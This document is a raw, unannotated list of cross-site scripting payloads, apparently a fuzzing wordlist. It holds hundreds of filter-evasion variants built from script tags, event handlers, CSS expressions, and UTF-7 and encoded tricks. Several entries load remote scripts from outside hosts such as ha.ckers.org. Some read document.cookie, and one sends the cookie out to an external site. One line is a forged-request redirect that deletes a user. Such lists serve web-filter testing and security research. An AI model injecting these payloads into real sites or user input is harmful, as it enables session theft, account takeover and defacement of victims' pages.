<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

¼script¾alert(¢XSS¢)¼/script¾

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

alert;pg("XSS")

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";

"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF

"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>

"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>

><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr

g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250

"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>

"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

http://www.<script>alert(1)</script .com

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

\x3Cscript>javascript:alert(1)</script>

'"`><script>/* *\x2Fjavascript:alert(1)// */</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->

-->

-->

-->

`"'><img src='#\x27 onerror=javascript:alert(1)>

"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>

"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF

"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:expression\x00(javascript:alert(1)">DEF

ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF

ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF

ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x09expression(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF

ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF

ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF

ABC<div style="x:\x20expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF

ABC<div style="x:\x00expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF

`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>

`"'><img src=xxx:x \x22onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>

`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>

`"'><img src=xxx:x \x09onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>

`"'><img src=xxx:x \x00onerror=javascript:alert(1)>

`"'><img src=xxx:x \x27onerror=javascript:alert(1)>

`"'><img src=xxx:x \x20onerror=javascript:alert(1)>

"`'><script>\x3Bjavascript:alert(1)</script>

"`'><script>\x0Djavascript:alert(1)</script>

"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>

"`'><script>\xE2\x80\x81javascript:alert(1)</script>

"`'><script>\xE2\x80\x84javascript:alert(1)</script>

"`'><script>\xE3\x80\x80javascript:alert(1)</script>

"`'><script>\x09javascript:alert(1)</script>

"`'><script>\xE2\x80\x89javascript:alert(1)</script>

"`'><script>\xE2\x80\x85javascript:alert(1)</script>

"`'><script>\xE2\x80\x88javascript:alert(1)</script>

"`'><script>\x00javascript:alert(1)</script>

"`'><script>\xE2\x80\xA8javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>

"`'><script>\xE1\x9A\x80javascript:alert(1)</script>

"`'><script>\x0Cjavascript:alert(1)</script>

"`'><script>\x2Bjavascript:alert(1)</script>

"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>

"`'><script>-javascript:alert(1)</script>

"`'><script>\x0Ajavascript:alert(1)</script>

"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>

"`'><script>\x7Ejavascript:alert(1)</script>

"`'><script>\xE2\x80\x87javascript:alert(1)</script>

"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>

"`'><script>\xE2\x80\xA9javascript:alert(1)</script>

"`'><script>\xC2\x85javascript:alert(1)</script>

"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x83javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>

"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x80javascript:alert(1)</script>

"`'><script>\x21javascript:alert(1)</script>

"`'><script>\xE2\x80\x82javascript:alert(1)</script>

"`'><script>\xE2\x80\x86javascript:alert(1)</script>

"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>

"`'><script>\x0Bjavascript:alert(1)</script>

"`'><script>\x20javascript:alert(1)</script>

"`'><script>\xC2\xA0javascript:alert(1)</script>

"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />

"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />

"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />

"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />

"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />

"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />

"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />

"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />

"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

"><img src=x onerror=javascript:alert(1)>

"><img src=x onerror=javascript:alert('1')>

"><img src=x onerror=javascript:alert("1")>

"><img src=x onerror=javascript:alert(`1`)>

"><img src=x onerror=javascript:alert(('1'))>

"><img src=x onerror=javascript:alert(("1"))>

"><img src=x onerror=javascript:alert((`1`))>

"><img src=x onerror=javascript:alert(A)>

"><img src=x onerror=javascript:alert((A))>

"><img src=x onerror=javascript:alert(('A'))>

"><img src=x onerror=javascript:alert('A')>

"><img src=x onerror=javascript:alert(("A"))>

"><img src=x onerror=javascript:alert("A")>

"><img src=x onerror=javascript:alert((`A`))>

"><img src=x onerror=javascript:alert(`A`)>

`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>

`"'><img src=xxx:x onerror\x00=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>

`"'><img src=xxx:x onerror\x20=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>

`"'><img src=xxx:x onerror\x09=javascript:alert(1)>

<video poster=javascript:javascript:alert(1)//

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<form><button formaction="javascript:javascript:alert(1)">X

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<img src=x onerror=javascript:alert(1)//">

<![><img src="]><img src=x onerror=javascript:alert(1)//">

<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>

<b <script>alert(1)</script>0

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

</ foo="><script>javascript:alert(1)</script>">

<? foo="><x foo='?><script>javascript:alert(1)</script>'>">

<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">

<% foo><x foo="%><script>javascript:alert(1)</script>">

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<img\x47src=x onerror="javascript:alert(1)">

<img\x10src=x onerror="javascript:alert(1)">

<img\x13src=x onerror="javascript:alert(1)">

<img\x32src=x onerror="javascript:alert(1)">

<img\x47src=x onerror="javascript:alert(1)">

<img\x11src=x onerror="javascript:alert(1)">

<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">

<img src="x` `<script>javascript:alert(1)</script>"` `>

<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X

<div style="font-family:'foo
;color:red;';">XXX

<div style="font-family:foo}color=red;">XXX

<// style=x:expression\28javascript:alert(1)\29>

<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X

<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X

<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

<event-source src="%(event)s" onload="javascript:alert(1)">

<<SCRIPT>%(payload)s//<</SCRIPT>

<IMG SRC="javascript:javascript:alert(1)"

<STYLE>@import'%(css)s';</STYLE>

<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">

<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS

<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>

<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X

<STYLE>@import'%(css)s';</STYLE>

<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>

<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

¼script¾alert(¢XSS¢)¼/script¾

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

"><h1/onmouseover='\u0061lert(1)'>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert(document&period;cookie)>Click Here</a>

<%

<input value=<><iframe/src=javascript:confirm(1)

<math><a xlink:href="//jsfiddle.net/t846h/">click

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<body/onload=<!-->&#10alert(1)>

<img src ?itworksonchrome?\/onerror = alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

'';!--"<XSS>=&{()}

'>//\\,<'>">">"*"

'); alert('XSS

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

"><script>alert(0)</script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div style="x:expression((window.r==1)?'':eval('r=1;

alert(String.fromCharCode(88,83,83));'))">

"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

" onfocus=alert(document.domain) "> <"

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>

">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

!--" /><script>alert('xss');</script>

"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>

<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>

"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>

'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='

"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="

\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'

http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??

http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??

'); alert('xss'); var x='

\\'); alert(\'xss\');var x=\'

//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>

</body>

</html>

<SCRIPT> alert(“XSS”); </SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT>alert('XSS')</SCRIPT>

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

exp/*<XSS STYLE='no\xss:noxss("*//*");

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
eval(a+b+c+d);

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>

<!--[if gte IE 4]>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<? echo('<SCR)';

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out

perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out

<SCRIPT SRC=http://ha.ckers.org/xss.js

<IMG SRC="javascript:alert('XSS')"

<IFRAME SRC=http://ha.ckers.org/scriptlet.html <

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<SCRIPT>a=/XSS/

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<img SRC="javascript:document.vulnerable=true;"

\";document.vulnerable=true;;//

</title><SCRIPT>document.vulnerable=true;</script>

1script3document.vulnerable=true;1/script3

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>

<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&<script>document.vulnerable=true;</script>

&{document.vulnerable=true;};

<a href="about:<script>document.vulnerable=true;</script>">

<<script>document.vulnerable=true;</script>

<![</script>

<script>document.vulnerable=true;</script>

<img src="blah>" onmouseover="document.vulnerable=true;">

<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

</script><script>alert(1)</script>

</br style=a:expression(alert())>

<scrscriptipt>alert(1)</scrscriptipt>

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS STYLE=xss:expression(alert('XSS'))>

"><script>alert('XSS')</script>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

